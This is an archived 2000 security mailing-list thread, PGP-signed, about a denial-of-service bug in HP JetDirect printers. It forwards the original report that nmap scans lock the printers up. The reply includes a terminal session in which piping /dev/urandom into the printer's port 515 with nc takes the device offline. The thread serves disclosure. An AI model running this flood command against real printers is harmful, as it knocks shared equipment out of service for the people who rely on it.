-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I've never seen nmap dos a HP4000 printer but they do die if you toss junk at
the spooler
port. The printer display says 86.00x EIO 1 Error, and the red attention light
goes on. At this
point you have to power the printer back on and off. The rev's are the same as
yours (G.08.x)
so it should work for you. I think the other isssue is why are printers running
all these services?
-John
# nmap -sT -PT 10.95.3.38
Starting nmap V. 2.30BETA20 by [EMAIL PROTECTED] ( www.insecure.org/nmap/ )
Interesting ports on (10.95.3.38):
(The 1511 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
80/tcp open http
280/tcp open http-mgmt
515/tcp open printer
631/tcp open unknown
9100/tcp open jetdirect
Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds
# ping 10.95.3.38
PING 10.95.3.38 (10.95.3.38): 56 data bytes
64 bytes from 10.95.3.38: icmp_seq=0 ttl=57 time=23.976 ms
^C
- --- 10.95.3.38 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 23.976/23.976/23.976/0.000 ms
# cat /dev/urandom | nc 10.95.3.38 515
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ^X^C punt! (give it a few minutes)
# ping 10.95.3.38
PING 10.95.3.38 (10.95.3.38): 56 data bytes
^C
- --- 10.95.3.38 ping statistics ---
9 packets transmitted, 0 packets received, 100% packet loss
>-----Original Message-----
>From: Alfred Huger [mailto:[EMAIL PROTECTED]]
>Sent: Thursday, April 20, 2000 11:45 AM
>To: [EMAIL PROTECTED]
>Subject: DOS attack against HP JetDirect Printers (fwd)
>
>
>Alfred Huger
>VP of Engineering
>SecurityFocus.com
>
>---------- Forwarded message ----------
>Date: Thu, 20 Apr 2000 13:08:47 +0200
>From: Paul Knowles <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Cc: [EMAIL PROTECTED]
>Subject: DOS attack against HP JetDirect Printers
>
>
>Hello,
>
>In case anyone is interested, scanning HP printers with
>tools such as nmap will cause the printer to lock up hard.
>I discovered this while trying to diagnose a connection
>problem we were having with a printer.
>I've verified this with at least the following versions of
>JetDirect:
>
>Firmware Rev. : A.08.06
>Firmware Rev. : G.08.03
>Firmware Rev. : G.07.17
>Firmware Rev. : G.07.03
>
>I haven't been able to establish the exact communications
>causing the lockup; someone with more experience than I
>should check this out.
>
>Any network accessable printer can be put out of service
>with a simple nmap -sT -PT HP.printer.tcp.ip
>A power cycle is required for reset.
>
>My apologies if i have the wrong email address.
>(there is no Submit a Bug instructions on the securityfocus
>site). HP have no bug reporting facilities either...
>
>thanks,
>
>Paul Knowles.
>email: [EMAIL PROTECTED]
>finger me at pexppc33.unifr.ch for more contact information
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.3
iQA/AwUBOQC+FiwFkokFbeHBEQLOjQCcD0+J+v2Og2I6XqZx/xdOSKs/H38An1Ig
bYNBTvOdrBJxZNpwtPL4CNtH
=k1y4
-----END PGP SIGNATURE-----
